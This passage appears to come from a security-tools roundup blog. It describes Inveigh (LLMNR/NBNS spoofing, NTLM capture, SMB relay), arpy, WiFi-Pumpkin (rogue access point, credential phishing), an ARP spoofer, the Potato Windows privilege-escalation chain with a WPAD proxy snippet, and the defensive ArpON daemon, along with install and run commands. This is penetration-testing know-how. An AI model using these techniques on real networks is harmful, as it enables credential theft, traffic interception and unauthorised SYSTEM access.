Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system’s SMB server.
.PARAMETER LLMNR
Default = Enabled: Enable/Disable LLMNR spoofing.
.PARAMETER NBNS
Default = Disabled: Enable/Disable NBNS spoofing.
.PARAMETER NBNSTypes
Default = 20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
.PARAMETER Challenge
Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
.PARAMETER SMBRelay
Default = Disabled: Enable/Disable SMB relay.
.PARAMETER SMBRelayTarget
IP address of system to target for SMB relay.
.PARAMETER SMBRelayCommand
Command to execute on SMB relay target.
.PARAMETER SMBRelayUsernames
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts either just the username of domain\username format.
.PARAMETER SMBRelayAutoDisable
Default = Enable: Automaticaly disable SMB relay after a successful command execution on target.
.PARAMETER SMBRelayNetworkTimeout
Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
.PARAMETER Repeat
Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
.PARAMETER ForceWPADAuth
Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
.PARAMETER ConsolePrompt
Default = Enabled: Enable/Disable the console prompt.
.PARAMETER RunTime
Set the run time duration in minutes. Note that leaving the Inveigh console open will prevent Inveigh from exiting once the set run time is reached.
.PARAMETER ConsoleOutput
Default = Console Output Disabled: Enable/Disable realtime console output.
.PARAMETER FileOutput
Default = File Output Disabled: Enable/Disable realtime file output.
.PARAMETER OutputDir
Default = Working Directory: Set an output directory for log and capture files.
.PARAMETER ShowHelp
Default = Enabled: Enable/Disable the help messages at startup.

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Notes:
– Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
– LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
– SMB challenge/response captures are performed by sniffing over the host system’s SMB service.
– HTTP challenge/response captures are performed with a dedicated listener.
– The local LLMNR/NBNS services do not need to be disabled on the host system.
– LLMNR/NBNS spoofer will point victims to host system’s SMB service, keep account lockout scenarios in mind.
– Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
– Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
– Output files will be created in current working directory.
– If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
– Code is proof of concept level and may not work under some scenarios.

Usage :
Obtain an elevated administrator or SYSTEM shell. If necessary, execute Set-ExecutionPolicy Unrestricted within PowerShell.
To execute with default settings:

Inveigh.ps1 -i localip

To execute with features enabled/disabled:

Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -SMB Y/N

Download: Master.zip  | Clone Url | Our Post Before
Source : https://github.com/Kevin-Robertson

Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions:
+ Packet Sniffing
+ Visited Domains
+ Visited Domains with Gource

arpy v3.15

Tested OS (to date):
+ Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)
+ Kali 2.0, fedora & Ubuntu tls 14.04

Requirements:
– Python 2.7
– Gource
– Scapy

usage :

git clone https://github.com/ivanvza/arpy
cd arpy
sudo apt-get install gource (kali, Debian & Ubuntu)
yum install gource (for fedora)
pip install scapy

./arpy.py

source : https://github.com/ivanvza

Changelog v0.71:
+ added update commits from repository
+ added QTableWidget filter (mac,ip,hostname) clients connected on AP.
+ added count of clients connected no AP.
+ changed name Tool Wifi-Pumpkin
+ locked dnsmasq support temporarily

wifipumpkin-v-0-7-1

WiFi-Pumpkin is security tool that provide the Rogue access point to Man-In-The-Middle and network attacks. purporting to provide wireless Internet services, but snooping on the traffic. can be used to capture of credentials of unsuspecting users by either snooping the communication by phishing.
Features
+ Rouge Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Crendentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mkd3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Posion
+ DNS Spoof

Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
./installer.sh --install

then
wifipumpkin (ubuntu)
wifi-pumpkin (kali 2.0)

Source : https://github.com/P0cL4bs

This tool allows intercepting Ipv4 traffic between two hosts on the same network. Typically between one machine and the internet gateway.

Features:
+ 1 to 1 route poisoning
+ save intercepted traffic as pcap file
+ automatic Ipv4 forwarding
Rust Crate Dependencies:
– pcap
– argparse
– nix
– time

TODO:
– implement n to m route poisoning
– remove –own parameter as soon as rust-pcap allows ip enumeration.

Usage:

git clone https://github.com/gcarq/arp-spoof && cd arp-spoof
cargo build 
cd arp-spoof/taget/debug
./arp-spoof -h (for print helper)

Note for arch Linux:
On Arch based Linux, install community/rust, community/cargo and core/libpcap. If not running as root, you need to set capabilities like so: sudo setcap cap_net_raw,cap_net_admin=eip path/to/bin

Source : https://github.com/gcarq

How it works?
Potato takes advantage of known issues in Windows to gain local privilege escalation, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Using the techniques outlined below, it is possible for an unprivileged user to gain “NT AUTHORITY\SYSYTEM” level access to a Windows host in default configurations.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches:

Potato – Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012

1. Local NBNS Spoofer
NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments. In penetration testing, we often sniff network traffic and respond to NBNS queries observed on a local network. For privilege escalation purposes, we can’t assume that we are able to sniff network traffic, so how can we accomplish NBNS spoofing?
If we can know ahead of time which host a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a response and flood the target host with NBNS responses (since it is a UDP protocol). One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response. We can overcome this by flooding quickly and iterating over all 65536 possible values.
In testing, this has proved to be 100% effective.

2. Fake WPAD Proxy Server
With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
At the same time, we run an HTTP server locally on 127.0.0.1. When it receives a request for “http://wpad/wpad.dat”, it responds with something like the following:

FindProxyForURL(url,host){
    if (dnsDomainIs(host, "localhost")) return "DIRECT";
    return "PROXY 127.0.0.1:80";}

This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.
Interestingly, this attack when performed by even a low privilege user will affect all users of the machine. This includes administrators, and system accounts. See the screenshots “egoldstein_spoofing.png” and “dade_spoofed.png” for an example.

3. HTTP -> SMB NTLM Relay
With all HTTP traffic now flowing through a server that we control, we can do things like request NTLM authentication…
In the Potato exploit, all requests are redirected with a 302 redirect to “http://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “http://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
The NTLM credentials are relayed to the local SMB listener to create a new system service that runs a user-defined command. This command will run with “NT AUTHORITY\SYSTEM” privilege.

Mitigations:
Enabling “Extended Protection for Authentication” in Windows should stop NTLM relay attacks.
SMB Signing may also mitigate this type of attack, however this would require some more research on my part to confirm.

Off Broadcast NBNS Spoofing
Using the same NBNS spoofing technique as the Potato exploit, we can perform NBNS spoofing against any host for which we can talk to UDP 137. We simply need to send UDP packets quickly enough to sneak in a valid reply before the NBNS request times out.

Download : potato-master.zip
Source :https://github.com/breenmachine

IMPORTANT NOTICE:
Since ArpON 3.0-ng (next generation), ArpON has been rewritten from scratch, therefore all the old versions of ArpON (lower of 3.0-ng) are deprecated. Please upgrade all installations of ArpON and read carefully the documentation and the man page of ArpON.

ArpON -ARP handler inspection-3.0-ng

ArpON (ARP handler inspection) is a Host-based solution that make the ARP standardized protocol secure in order to avoid the Man In The Middle (MITM) attack through the ARP spoofing, ARP cache poisoning or ARP poison routing attack.
This is possible using three kinds of anti ARP spoofing techniques:
+ SARPI (Static ARP Inspection) for the statically configured networks without DHCP;
+ DARPI (Dynamic ARP Inspection) for the dynamically configured networks with DHCP;
+ HARPI (Hybrid ARP Inspection) for the statically and dynamically configured networks with DHCP.
The goal of ArpON is therefore to provide a secure and efficient network daemon that provides the SARPI, DARPI and HARPI anti ARP spoofing technique, thus making the ARP standardized protocol secure from any foreign intrusion.

ArpON -ARP handler inspection-3.0-ng

The features of ArpON are:
+ Free. ArpON is released under the BSD open source license. This means that you have total freedom to modify and use it with your system, even if it’s commercial.
+ Popular. ArpON is used as the network daemon by many users, both the network managers and academic researchers. ArpON is downloaded several hundred of times every month.
+ Tested and reliable. Many users have contributed over the years in testing ArpON on a wide range of Man In The Middle (MITM) attack tools through the ARP spoofing, ARP cache poisoning or ARP poison routing.
+ Easy to use. ArpON is distributed as a single tarball that once compiled, runs on every supported Operating System. You launch the executable, and from that moment the Operating System is able to avoid the Man In The Middle (MITM) attack through the ARP spoofing, ARP cache poisoning or ARP poison routing.
+ Multi-platform. Many developers have contributed over the years in porting ArpON on a wide range of GNU/Linux distributions.
+ Compatible and portable. ArpON is completely compatible with the ARP standardized protocol. ArpON is an network daemon that runs in user space, this also means that ArpON will be easily portable to other Operating Systems.
+ Well documented. The documentation of ArpON is easy and complete. The documentation contains the retrieving tutorial; the building tutorial; the installation tutorial; the user tutorial with many examples and scenarios; the development tutorial with the Activity diagrams of the SARPI, DARPI and HARPI anti ARP spoofing technique and with modular source code well commented; the bug report tutorial that takes you step-by-step through all of the features of ArpON.

Installation:

sudo apt-get install libnet1-dev
sudo apt-get install pthread
for more dependency read here http://arpon.sourceforge.net/documentation.html#11
wget http://sourceforge.net/projects/arpon/files/latest/download -O arpon.tar.gz 
wget http://sourceforge.net/projects/arpon/files/latest.md5/download -O latest.md5 
md5sum arpon.tar.gz | awk '{print $1}' > arpon.md5
mkdir arpon
tar -xvzf arpon.tar.gz -C arpon --strip-components=1

mkdir build
cd build
cmake ..
make
sudo make install

Source : http://arpon.sourceforge.net
Our Post Before